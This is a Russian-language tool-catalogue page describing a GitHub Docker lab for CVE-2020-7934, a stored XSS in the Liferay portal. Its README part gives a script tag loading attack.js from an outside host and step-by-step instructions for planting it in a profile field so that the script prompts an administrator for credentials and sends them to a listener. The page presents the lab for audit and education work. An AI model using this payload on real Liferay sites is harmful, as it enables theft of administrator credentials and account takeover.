Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
audit-xss-cve-2020-7934 — Эксплойт XSS на основе Docker для CVE-2020-7934, нацеленный на портал Liferay. Демонстрирует хранимый XSS через поля профиля пользователя для кражи учетных данных администратора. | Kitploit
Инструменты/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

Эксплойт XSS на основе Docker для CVE-2020-7934, нацеленный на портал Liferay. Демонстрирует хранимый XSS через поля профиля пользователя для кражи учетных данных администратора.

Репозиторий
454 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 2020-7934

Как запустить CVE

Требования

  1. docker

Замечания

можно разместить скрипт атаки онлайн (учитывая js код) http://yourjavascript.com/ Наш JS скрипт онлайн для атаки html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

Команды для настройки

  1. перейдите в корневую папку этого проекта
  2. выполните "sudo docker-compose up --build"
  3. новый терминал: выполните "docker inspect liferay" ==> и скопируйте значение IPAddress
  4. новый терминал: выполните "python api_attacker.py"
  5. откройте браузер и перейдите по адресу "http://IPAddress:8080" ==> вы должны получить портал liferay в качестве ответа
  6. для остановки и удаления контейнеров используйте "sudo docker-compose rm"

Инструкции для атаки

  • Зарегистрируйтесь в liferay как пользователь, войдите в систему и в разделе "available sites" присоединитесь к сайту "liferay".
  • Измените "фамилию" на JS-скрипт (напрямую () или через "src =" http ... "")
  • Войдите как администратор liferay (имя пользователя: [email protected], пароль: test)
  • Перейдите в доступные сайты и нажмите на "liferay", откроется публичная страница этого сайта.
  • Перейдите на новую страницу, справа откроется меню, нажмите на mermbership.
  • Выберите пользователя, зарегистрированного на шаге 1. В этот момент будет выполнен скрипт. 5.1) В скрипте attack.js страница запросит учетные данные.
  • В терминале шага 5 (из раздела Команды для настройки) будут выведены имя пользователя/пароль, введенные на шаге 5.1 (администратором) )
  • Скачать инструмент